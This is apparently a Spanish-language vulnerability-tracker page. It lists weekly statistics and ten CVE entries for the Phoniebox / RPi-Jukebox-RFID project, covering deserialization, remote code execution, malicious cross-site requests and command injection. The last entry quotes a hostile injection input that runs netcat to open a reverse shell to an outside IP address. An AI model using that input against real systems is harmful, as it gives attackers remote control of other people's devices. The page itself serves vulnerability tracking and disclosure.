Vulnerabilidades
Resumen — últimos 7 días
Vulnerabilidades nuevas2676▼ 422 respecto a la semana anterior
Críticas / altas1295▼ 73 respecto a la semana anterior
Nueva explotación activa (KEV)5▼ 3 respecto a la semana anterior
Sin puntuar (sin CVSS)244▼ 274 respecto a la semana anterior
10 resultados, ordenados por fecha de publicación (más recientes primero)
| CVE | Estado | Severidad | EPSS | Explotación activa | Tecnologías afectadas | Publicada ▼ | Modificada | Descripción |
|---|---|---|---|---|---|---|---|---|
| Analizada | Alta (7.5) | 0.53% | — | Sourcefabric Phoniebox | 18/12/2025 | 17/6/2026 | An insecure deserialization vulnerability exists in the rss-mp3.php script of the MiczFlor RPi-Jukebox-RFID project through commit 4b2334f0ae0e87c0568876fc41c48c38aa9a7014 (2025-10-07). The 'rss' GET parameter receives data that is passed directly to the unserialize() function without validation. This allows a remote,… | |
| Analizada | Crítica (9.8) | 0.95% | — | Sourcefabric Phoniebox | 29/8/2024 | 17/6/2026 | RPi-Jukebox-RFID v2.7.0 was discovered to contain a remote code execution (RCE) vulnerability via htdocs\inc.setWifi.php | |
| Analizada | Crítica (9.8) | 0.95% | — | Sourcefabric Phoniebox | 29/8/2024 | 17/6/2026 | RPi-Jukebox-RFID v2.7.0 was discovered to contain a remote code execution (RCE) vulnerability via htdocs\inc.setWlanIpMail.php | |
| Analizada | Crítica (9.8) | 0.95% | — | Sourcefabric Phoniebox | 29/8/2024 | 17/6/2026 | RPi-Jukebox-RFID v2.7.0 was discovered to contain a remote code execution (RCE) vulnerability via htdocs\api\playlist\appendFileToPlaylist.php | |
| Analizada | Crítica (9.8) | 0.95% | — | Sourcefabric Phoniebox | 29/8/2024 | 17/6/2026 | RPi-Jukebox-RFID v2.7.0 was discovered to contain a remote code execution (RCE) vulnerability via htdocs\userScripts.php | |
| Analizada | Crítica (9.8) | 0.95% | — | Sourcefabric Phoniebox | 29/8/2024 | 17/6/2026 | RPi-Jukebox-RFID v2.7.0 was discovered to contain a remote code execution (RCE) vulnerability via htdocs\trackEdit.php | |
| Analizada | Crítica (9.8) | 0.95% | — | Sourcefabric Phoniebox | 29/8/2024 | 17/6/2026 | RPi-Jukebox-RFID v2.7.0 was discovered to contain a remote code execution (RCE) vulnerability via htdocs\manageFilesFolders.php | |
| Aplazada | Alta (8.7) | 15% | — | Sourcefabric PhonieboxAI | 10/7/2024 | 17/6/2026 | Insecure handling of POST header parameter body included in requests being sent to an instance of the open-source project Phoniebox allows an attacker to create a website, which – when visited by a user – will send malicious requests to multiple hosts on the local network. If such a request reaches the server, it will… | |
| Aplazada | Alta (8.7) | 0.48% | — | Sourcefabric PhonieboxAI | 10/7/2024 | 17/6/2026 | Insecure handling of GET header parameter file included in requests being sent to an instance of the open-source project Phoniebox allows an attacker to create a website, which – when visited by a user – will send malicious requests to multiple hosts on the local network. If such a request reaches the server, it will… | |
| Modificada | Crítica (9.8) | 1.6% | — | Sourcefabric Phoniebox | 19/1/2024 | 17/6/2026 | A vulnerability was found in MiczFlor RPi-Jukebox-RFID up to 2.5.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file userScripts.php of the component HTTP Request Handler. The manipulation of the argument folder with the input ;nc 104.236.1.147 4444 -e /bin/bash; leads to… |